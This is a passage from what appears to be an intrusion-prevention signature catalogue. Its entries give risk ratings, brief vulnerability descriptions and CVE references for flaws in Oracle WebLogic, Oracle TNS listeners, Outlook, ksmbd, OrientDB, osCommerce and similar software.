Software: Oracle WebLogic Server
Type: Input Validation
Description: There exists an insecure deserialization vulnerability in Oracle WebLogic. Successful exploitation could allow an unauthenticated attacker to execute arbitrary code on the vulnerable server.
Situation: Generic_CS-Oracle-WebLogic-Insecure-Deserialization-CVE-2021-2394
References:
CVE-2021-2394
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2394
Back to top

Oracle-WebLogic-Limitfilter-Insecure-Deserialization

About this vulnerability: A vulnerability in Oracle Coherence
Risk: Moderate
First detected in: sgpkg-ips-1233-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Coherence; Oracle WebLogic Server
Type: Input Validation
Description: There has been reported an insecure deserialization vulnerability in Oracle Weblogic. Successful exploitation could lead in arbitrary code execution on target server.
Situation: Generic_CS-Oracle-WebLogic-Limitfilter-Insecure-Deserialization
References:
CVE-2020-2555
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2555
Back to top

Oracle-WebLogic-Remote-Diagnosis-Assistant-Command-Injection

About this vulnerability: A vulnerability in Oracle Diagnosis Assistant
Risk: Moderate
First detected in: sgpkg-ips-1042-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Diagnosis Assistant
Type: Input Validation
Description: Improper handling of HTTP requests causes a command injection vulnerability in Oracle Diagnosis Assistant. A successful exploit allows an attacker to execute arbitrary commands on the target system.
Situation: HTTP_CRL-Oracle-WebLogic-Remote-Diagnosis-Assistant-Command-Injection
References:
CVE-2018-2616
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2616
Back to top

Oracle-WebLogic-Remote-Diagnosis-Assistant-Rda_tfa_Ref_Date-Command-Injection

About this vulnerability: A vulnerability in Oracle Diagnosis Assistant
Risk: Moderate
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Diagnosis Assistant
Type: Input Validation
Description: There has been reported a command injection vulnerability in the web console of the Oracle WebLogic Remote Diagnosis Assistant. A remote, authenticated attacker can exploit this vulnerability by sending a maliciously crafted request to the target server. Successful exploitation can lead to arbitrary command execution.
Situation: HTTP_CSU-Oracle-WebLogic-Remote-Diagnosis-Assistant-Rda_tfa_Ref_Date-Command-Injection
References:
CVE-2018-2615
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2615
Back to top

Oracle-WebLogic-Server-AbsPlatTransManager-Insecure-Deserialization

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: High
First detected in: sgpkg-ips-1117-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in Oracle WebLogic Server. This vulnerability is due to deserialization of untrusted data contained within T3 requests. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted serialized object. Successful exploitation can result in arbitrary code execution in the context of the user account running WebLogic.
Situation: Generic_CS-Oracle-WebLogic-Server-AbsPlatTransManager-Insecure-Deserialization
References:
CVE-2018-3191
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3191
Back to top

Oracle-WebLogic-Server-Admin-Console-War-Deployment

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: High
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Malfunction
Description: A vulnerability in WebLogic Server Administration Console 12 and prior, which allows remote attackers to install malicious Java applications and execute arbitrary code.
Situation: HTTP_CRL-Oracle-WebLogic-Server-Admin-Console-War-Deployment
Back to top

Oracle-WebLogic-Server-Aqjmsinitialcontextfactory-JNDI-Injection

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: High
First detected in: sgpkg-ips-1698-5242
Last changed: sgpkg-ips-1698-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: An information disclosure vulnerability has been reported in Oracle WebLogic Server. This vulnerability is due to improper handling user supplied data in AQjmsInitialContextFactory class leading to an JNDI injection. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to a vulnerable server. Successful exploitation results in the target server performing a JNDI lookup to an attacker controlled server, and in the worst case execution of arbitrary code under the security context of the affected service.
Situation: Generic_CS-Oracle-WebLogic-Server-Aqjmsinitialcontextfactory-JNDI-Injection
References:
CVE-2024-20931
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20931
Back to top

Oracle-WebLogic-Server-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: High
First detected in: sgpkg-ips-1138-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: A vulnerability in Oracle WebLogic Server, versions 10.3.6.0, 12.1.3.0, 12.2.1.2, and 12.2.1.3, which allows remote attcakers to upload arbitrary files and execute code due to the lack of input validation of keystore files.
Situation: HTTP_CS-Oracle-WebLogic-Server-Arbitrary-File-Upload
References:
CVE-2018-2894
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2894
Back to top

Oracle-WebLogic-Server-Commons-Collections-Library-Insecure-Deserialization

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: High
First detected in: sgpkg-ips-709-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Malfunction
Description: An insecure deserialization vulnerability has been reported in Oracle WebLogic Server. This vulnerability is due to deseralization of untrusted data while having the vulnerable version of Apache Commons-Collections library in the code path. A remote, unauthenticated attacker can exploit this vulnerability by sending a request message that contains a specially crafted serialized object. Successful exploitation can result in arbitrary code execution in the security context of the System user.
Situation: Generic_CS-Oracle-WebLogic-Server-Commons-Collections-Library-Insecure-Deserialization
References:
CVE-2015-4852
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4852
Back to top

Oracle-WebLogic-Server-CVE-2020-14825

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: High
First detected in: sgpkg-ips-1297-5242
Last changed: sgpkg-ips-1297-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: There exists an insecure deserialization vulnerability in Oracle Weblogic. Successful exploitation could lead in arbitrary code execution.
Situation: Generic_TCP-Oracle-WebLogic-CVE-2020-14825-Insecure-Deserialization
References:
CVE-2020-14825
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14825
Back to top

Oracle-WebLogic-Server-CVE-2020-14882

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: High
First detected in: sgpkg-ips-1293-5242
Last changed: sgpkg-ips-1408-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: A remote code execution vulnerability has been reported in Oracle WebLogic Server. This vulnerability is due to improper sanitization of user-supplied data via HTTP. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a vulnerable server. Successful exploitation can result in arbitrary code execution under the security context of the affected server. This situation also covers the the exploit attempts of the vulnerability CVE-2020-14750 and CVE-2020-14883.
Situation: HTTP_CRL-Oracle-WebLogic-Server-CVE-2020-14882
References:
CVE-2020-14882
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14882
Back to top

Oracle-WebLogic-Server-CVE-2021-2109-JNDI-Injection

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: High
First detected in: sgpkg-ips-1320-5242
Last changed: sgpkg-ips-1320-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: A JNDI injection vulnerability has been reported in Oracle Weblogic Server. This vulnerability is due to improper handling user supplied data. A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to a vulnerable server. Successful exploitation results in the target server retrieving a potentially malicious serialized object from an attacker controlled server which may lead to the execution of arbitrary code under the security context of the affected server.
Situation: HTTP_CRL-Oracle-WebLogic-Server-CVE-2021-2109-JNDI-Injection
References:
CVE-2021-2109
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2109
Back to top

Oracle-WebLogic-Server-Deploymentservice-Directory-Traversal

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: Moderate
First detected in: sgpkg-ips-1153-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Directory Traversal
Description: There has been reported a directory traversal vulnerability in Oracle WebLogic Server. This vulnerability is remotely exploitable. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CS-Oracle-WebLogic-Server-Deploymentservice-Directory-Traversal
References:
CVE-2019-2618
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2618
Back to top

Oracle-WebLogic-Server-DeploymentServiceServlet-Insecure-Deserialization

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: High
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in Oracle WebLogic Server. This vulnerability is due to deserialization of untrusted data contained within HTTP requests by DeploymentServiceServlet. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted serialized object. Successful exploitation can result in arbitrary code execution in the context of the user account running WebLogic.
Situation: HTTP_CS-Oracle-WebLogic-Server-DeploymentServiceServlet-Insecure-Deserialization
References:
CVE-2018-3252
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3252
Back to top

Oracle-WebLogic-Server-Deserialization-RCE

About this vulnerability: A vulnerability in Oracle Weblogic Server
Risk: High
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: A vulnerability in Oracle Weblogic Server T3 which allows remote attackers to execute arbitrary code by sending a malicious SOAP request to the interface WLS AsyncResponseService.
Situation: HTTP_CRL-Oracle-WebLogic-Server-Deserialization-RCE
References:
CVE-2017-10271
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271
Back to top

Oracle-WebLogic-Server-Deserialization-Remote-Command-Execution-Vulnerability

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: High
First detected in: sgpkg-ips-1067-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Malfunction
Description: A vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware, versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3., which allows unauthenticated users to compromise the server via unsafe deserialization of Java objects using the T3 protocol.
Situation: Generic_CS-Oracle-WebLogic-Server-Deserialization-Remote-Command-Execution-Vulnerability
References:
CVE-2018-2628
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2628
Back to top

Oracle-WebLogic-Server-Filedistributionservlet-Information-Disclosure

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: Moderate
First detected in: sgpkg-ips-1158-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Directory Traversal
Description: Improper validation of the HTTP headers causes a vulnerability in Oracle WebLogic Server. A successful expoit allows an attacker to read arbitrary files on the target system.
Situation: HTTP_CS-Oracle-WebLogic-Server-Filedistributionservlet-Information-Disclosure
References:
CVE-2019-2615
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2615
Back to top

Oracle-WebLogic-Server-Fileupload-Library-Insecure-Deserialization

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: Moderate
First detected in: sgpkg-ips-784-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Malfunction
Description: Insecure deserialization in the fileupload library in Apache Commons results in a vulnerability in Oracle WebLogic Server that allows an attacker to upload arbitrary files to the target system.
Situation: Generic_CS-Oracle-WebLogic-Server-Fileupload-Library-Insecure-Deserialization
References:
CVE-2013-2186
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2186
BID-63174
http://www.securityfocus.com/bid/63174
Back to top

Oracle-WebLogic-Server-Information-Disclosure-Vulnerability-CVE-2023-21839

About this vulnerability: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Risk: High
First detected in: sgpkg-ips-1584-5242
Last changed: sgpkg-ips-1584-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: This vulnerability can be exploited through the T3/IIOP protocol network, which transfers information between Oracle WebLogic servers and other Java programs. An attacker can exploit this vulnerability without any privileges and execute low-complexity attacks to gain unauthorized access to sensitive data.
Situation: Generic_CS-Oracle-WebLogic-Server-Information-Disclosure-Vulnerability-CVE-2023-21839
References:
CVE-2023-21839
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21839
Back to top

Oracle-WebLogic-Server-LinkRef-JNDI-Injection-CVE-2023-21931

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: High
First detected in: sgpkg-ips-1601-5242
Last changed: sgpkg-ips-1601-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: A JNDI injection vulnerability has been reported in Oracle Weblogic Server. This vulnerability is due to improper handling of user input when using the server naming service to bind a LinkRef object. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to a vulnerable server. Successful exploitation results in the target server performing a JNDI lookup to an attacker controlled server, and in the worst case execution of arbitrary code under the security context of the affected server.
Situation: Generic_CS-Oracle-WebLogic-Server-LinkRef-JNDI-Injection-CVE-2023-21931
References:
CVE-2023-21931
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21931
Back to top

Oracle-WebLogic-Server-Local-File-Inclusion-CVE-2022-21371

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: High
First detected in: sgpkg-ips-1502-5242
Last changed: sgpkg-ips-1502-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: A local file inclusion vulnerability has been reported in Oracle WebLogic Server. A successful attack allows remote attackers to gain access to sensitive information without authentication.
Situation: HTTP_CSU-Oracle-WebLogic-Server-Local-File-Inclusion-CVE-2022-21371
References:
CVE-2022-21371
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21371
Back to top

Oracle-WebLogic-Server-Node-Manager-Command-Execution

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: High
First detected in: sgpkg-ips-411-4219
Last changed: sgpkg-ips-1733-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Malfunction
Description: A command execution vulnerability exists in Oracle WebLogic Server's Node Manager utility. The vulnerability is due to the fact that certain script execution functionality of the Node Manager utility can be accessed remotely without authentication. A remote unauthenticated attacker can leverage this vulnerability by sending a crafted message to the vulnerable process on port 5556/TCP. Successful exploitation could result in execution of arbitrary commands within the security context of the target process. The behaviour of the target is dependent on the intention of the malicious command.
Situation: Generic_CS-Oracle-WebLogic-Server-Node-Manager-Command-Execution
Back to top

Oracle-WebLogic-Server-RCE-Vulnerability-CVE-2019-2725

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: High
First detected in: sgpkg-ips-1153-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Malfunction
Description: There exists a vulnerability in the Oracle WebLogic Server which allows unauthenticated users to compromise the server via unsafe deserialization of Java objects using the T3 protocol.
Situation: Generic_CS-Oracle-WebLogic-Server-Remoteobject-Insecure-Deserialization
References:
CVE-2019-2725
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2725
Back to top

Oracle-WebLogic-Server-Remote-Command-Execution-CVE-2017-3506

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: High
First detected in: sgpkg-ips-1822-5242
Last changed: sgpkg-ips-1822-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: A remote command execution has been reported in the Web Services component of the Oracle WebLogic Server. Affected versions include 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1, and 12.2.1.2. An unauthenticated attacker could use this vulnerability to execute arbitrary OS commands via a crafted HTTP request.
Situation: HTTP_CS-Oracle-WebLogic-Server-Workcontextxmlinputadapter-Insecure-Deserialization
References:
CVE-2017-3506
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3506
Back to top

Oracle-WebLogic-Server-Remoteobject-Insecure-Deserialization

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: Moderate
First detected in: sgpkg-ips-1111-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: There has been reported an insecure deserialization vulnerability in Oracle WebLogic Server. This vulnerability can be exploited remotely. Successful exploitation results in arbitrary code execution.
Situation: Generic_CS-Oracle-WebLogic-Server-Remoteobject-Insecure-Deserialization
References:
CVE-2018-3245
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3245
Back to top

Oracle-WebLogic-Server-Session-Fixation

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Malfunction
Description: There is a session fixation vulnerability in Oracle WebLogic Server. This vulnerability allows attackers to fixate session identifiers for user sessions and potentially gain unauthorized access to the affected product. The vulnerability is due to an error in the when processing sessions in web applications created using WebLogic's framework. A remote attacker can exploit this vulnerability by enticing a user to visit a specially crafted web page. Successful exploitation would let the attacker gain access to the pages that are authorized to the victim user.
Situation: Generic_SS-Oracle-WebLogic-Server-Session-Fixation
HTTP_SHS-Oracle-WebLogic-Server-Session-Fixation
References:
CVE-2010-4437
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4437
BID-45852
http://www.securityfocus.com/bid/45852
OSVDB-70571
http://www.osvdb.org/70571
Back to top

Oracle-WebLogic-Server-Unicastref-Insecure-Deserialization

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: Moderate
First detected in: sgpkg-ips-860-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Malfunction
Description: Deseralization of untrusted data in Oracle WebLogic Server while having the UnicastRef class in the code path causes a vulnerability which a remote, unauthenticated attacker can exploit by sending a specially crafted serialized object. Successful exploitation can result in arbitrary code execution in the context of the user running WebLogic.
Situation: Generic_CS-Oracle-WebLogic-Server-Unicastref-Insecure-Deserialization
References:
CVE-2017-3248
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3248
Back to top

Oracle-WebLogic-Server-Web-Service-Config-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: Moderate
First detected in: sgpkg-ips-1091-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: A vulnerability in Oracle WebLogic Server
Situation: File-Text_Oracle-WebLogic-Server-Web-Service-Config-Arbitrary-File-Upload
References:
CVE-2018-2894
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2894
Back to top

Oracle-WebLogic-Server-Workcontextxmlinputadapter-Insecure-Deserialization

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: Moderate
First detected in: sgpkg-ips-1029-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: Insufficient validation of serialized XML data by the WorkContextXmlInputAdapter class in the Oracle WebLogic Server causes a vulnerability which can be exploited to gain the ability to execute arbitrary code on the target system.
Situation: HTTP_CS-Oracle-WebLogic-Server-Workcontextxmlinputadapter-Insecure-Deserialization
References:
CVE-2017-10271
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271
Back to top

Oracle-WebLogic-Unknownmsgheader-External-Entity-Injection

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: High
First detected in: sgpkg-ips-1174-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: An XXE vulnerability has been reported in Oracle Weblogic. This vulnerability is due to insufficient validation of XML data. A remote attacker could exploit this vulnerability by sending malicious XML data to the target server. Successful exploitation could result in the disclosure of file content on the target machine.
Situation: Generic_CS-Oracle-WebLogic-Unknownmsgheader-External-Entity-Injection
References:
CVE-2019-2649
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2649
Back to top

Oracle-WebLogic-Wsrmsequencecontext-External-Entity-Injection

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: Moderate
First detected in: sgpkg-ips-1176-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: Insufficient validation of client-provided XML data causes an external entity injection vulnerability in Orace WebLogic Server. A successful exploit may allow an attacker to gain access to file contents of the target system.
Situation: Generic_CS-Oracle-WebLogic-Wsrmsequencecontext-External-Entity-Injection
References:
CVE-2019-2650
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2650
Back to top

Oracle-WebLogic-Wsrmserverpayloadcontext-External-Entity-Injection

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: Moderate
First detected in: sgpkg-ips-1169-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: There has been reported an XXE vulnerability in Oracle Weblogic. This vulnerability could be exploited by a remote attacker. Successful exploitation could lead in information disclosure.
Situation: Generic_CS-Oracle-WebLogic-Wsrmserverpayloadcontext-External-Entity-Injection
References:
CVE-2019-2648
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2648
Back to top

Oracle10g-TNS-Auth-Sesskey-BOF

About this vulnerability: Buffer overflow in Oracle 10g TNS listener
Risk: High
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle 10g
Type: Buffer Overflow
Description: Oracle 10g is vulnerable to a buffer overflow in the Transparent Network Substrate (TNS) Listener.
Situation: Generic_CS-Oracle10g-TNS-Auth-Sesskey-BOF
TNS_Oracle10g-TNS-Auth-Sesskey-BOF
References:
CVE-2009-1979
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1979
BID-36747
http://www.securityfocus.com/bid/36747
OSVDB-59110
http://www.osvdb.org/59110
Back to top

Oracle8i-TNS-Listener-BOF

About this vulnerability: Buffer overflow in Oracle 8i TNS listener
Risk: High
First detected in: sgpkg-ips-17-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle 8i
Type: Buffer Overflow
Description: Oracle 8i is vulnerable to a buffer overflow in the Transparent Network Substrate (TNS) Listener. By sending a one-packet command to the Net8 protocol, a remote attacker can overflow a buffer and execute arbitrary code on the system to gain administrator privileges.
Situation: TNS_Oracle8i-TNS-Listener-BOF
References:
CVE-2001-0499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0499
BID-2941
http://www.securityfocus.com/bid/2941
OSVDB-9427
http://www.osvdb.org/9427
Back to top

Orbit-Downloader-Stack-Based-Buffer-Overflow

About this vulnerability: A stack based buffer overflow vulnerability in Orbit Downloader.
Risk: High
First detected in: sgpkg-ips-665-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Orbit Downloader
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in Orbit Downloader 2.8.2 and 2.8.3 which allows remote attackers to execute arbitrary code via a crafted HTTP URL with a long host name.
Situation: File-Text_Orbit-Downloader-Stack-Based-Buffer-Overflow
References:
CVE-2009-0187
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0187
BID-33894
http://www.securityfocus.com/bid/33894
OSVDB-52294
http://www.osvdb.org/52294
Back to top

Orcus-RAT-Infection-Traffic

About this vulnerability: Orcus RAT infection traffic was detected
Risk: High
First detected in: sgpkg-ips-1374-5242
Last changed: sgpkg-ips-1374-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Orcus RAT infection traffic was detected.
Situation: TLS_SS-Orcus-RAT-Infection-Traffic
TLS-SNI_Orcus-RAT-Infection-Traffic
Back to top

OrientDB-Remote-Code-Execution

About this vulnerability: An OrientDB Remote Code Execution vulnerability
Risk: High
First detected in: sgpkg-ips-1022-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Linux; Unix
Software: OrientDB
Type: Malfunction
Description: A vulnerability in OrientDB, versions 2.2.2 through 2.2.22, which allows remote attackers to execute unsandboxed OS commands.
Situation: HTTP_CRL-OrientDB-Remote-Code-Execution
Back to top

osCommerce-Installer-Unauthenticated-Code-Execution

About this vulnerability: An osCommerce Installer Unauthenticated Code Execution vulnerability
Risk: High
First detected in: sgpkg-ips-1071-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: osCommerce
Type: Malfunction
Description: A vulnerability in osCommerce, version 2.3.4.1, which allows remote attackers to inject PHP code into a newly created install script due to the install_4.php script not checking to see if the page is already installed.
Situation: HTTP_CRL-osCommerce-Installer-Unauthenticated-Code-Execution
Back to top

Ourgame-GlobalLink-GLChat-ActiveX-Control-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Ourgame GlobalLink
Risk: High
First detected in: sgpkg-ips-136-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Ourgame GlobalLink
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the GLChat ActiveX component included in Ourgame GlobalLink. The vulnerability allows arbitrary code execution in the context of the current user.
Situation: HTTP_SS-Ourgame-GlobalLink-GLChat-ActiveX-Control-Buffer-Overflow
File-Text_Ourgame-GlobalLink-GLChat-ActiveX-Control-Buffer-Overflow
References:
CVE-2007-5722
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5722
BID-26244
http://www.securityfocus.com/bid/26244
OSVDB-38837
http://www.osvdb.org/38837
Back to top

Ourworld-GLWorld-ActiveX-Component-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Ourworld GLWorld
Risk: High
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Ourworld GLWorld
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Ourworld GLWorld ActiveX component. The vulnerability allows execution of arbitrary code in the context of the current user.
Situation: HTTP_SS-Ourworld-GLWorld-ActiveX-Component-Buffer-Overflow
File-Text_Ourworld-GLWorld-ActiveX-Component-Buffer-Overflow
References:
CVE-2008-0647
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0647
BID-27626
http://www.securityfocus.com/bid/27626
Back to top

Out-Of-Bound-Memory-Read-In-Smb-Kernel-Server-Ksmbd-ZDI-22-1691

About this vulnerability: An attempt to exploit a vulnerability in ksmbd detected
Risk: High
First detected in: sgpkg-ips-1541-5242
Last changed: sgpkg-ips-1542-5242
Platform: Linux
Software: ksmbd
Type: Input Validation
Description: The flaw exists within the handling of SMB2_WRITE commands in SMB Kernel Server ksmbd. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the kernel.
Situation: SMB-TCP_Out-Of-Bound-Memory-Read-In-Smb-Kernel-Server-Ksmbd-ZDI-22-1691
References:
CVE-2022-47940
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-47940
Back to top

Outlook-BOF-MS04-009

About this vulnerability: Microsoft Outlook Buffer Overflow Vulnerability (MS04-009)
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Outlook
Type: Buffer Overflow
Description: Microsoft Outlook, an email client, contains a vulnerability in the handling of a mailto: URI. The lack of filtering of parameters passed to Outlook via the "mailto:" URI allows for script execution in the Local Machine zone on a vulnerable system. The expected behaviour of the attack target depends on the payload script carried in the malicious "mailto:" link. Since the script could execute a wide variety of functions in the local domain zone, it would be difficult to predict the behaviour of the target system.
Situation: File-Text_Microsoft-Outlook-Mail-To-RCE
References:
CVE-2004-0121
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0121
BID-9827
http://www.securityfocus.com/bid/9827
MS04-009
http://technet.microsoft.com/security/bulletin/MS04-009
Back to top

Outlook-Express-And-Windows-Mail-NNTP-Handling-Code-Execution

About this vulnerability: A vulnerability in Microsoft Outlook Express
Risk: Moderate
First detected in: sgpkg-ips-437-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability exists in Microsoft Outlook Express and Windows Mail. Specifically the vulnerability is due to lack of boundary check when processing news subjects from the NNTP server. Successful exploitation would allow the attacker to execute arbitrary code on the vulnerable client system, in the context of the logged in user. An attack targeting this vulnerability can result in the injection and execution of arbitrary code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any injected code will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, Microsoft Outlook Express and/or Windows Mail will terminate unexpectedly.
Situation: NNTP_Microsoft-Outlook-Express-And-Windows-Mail-NNTP-Handling-Code-Execution
References:
CVE-2007-3897
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3897
BID-25908
http://www.securityfocus.com/bid/25908
MS07-056
http://technet.microsoft.com/security/bulletin/MS07-056
Back to top

Overly-Long-RTSP-Host-Header

About this vulnerability: An overly long RTSP Host header
Risk: Moderate
First detected in: sgpkg-ips-1645-5242
Last changed: sgpkg-ips-1645-5242
Platform: Generic
Software: Any Software
Type: Malfunction
Description: An overly long Host header was seen in an RTSP request. This might indicate an attempt to exploit a buffer overflow vulnerability.
Situation: Generic_CS-Overly-Long-RTSP-Host-Header
Back to top

Owncloud-Information-Disclosure-CVE-2023-49103

About this vulnerability: A vulnerability in ownCloud
Risk: High
First detected in: sgpkg-ips-1657-5242
Last changed: sgpkg-ips-1657-5242
Platform: Generic
Software: ownCloud
Type: Malfunction
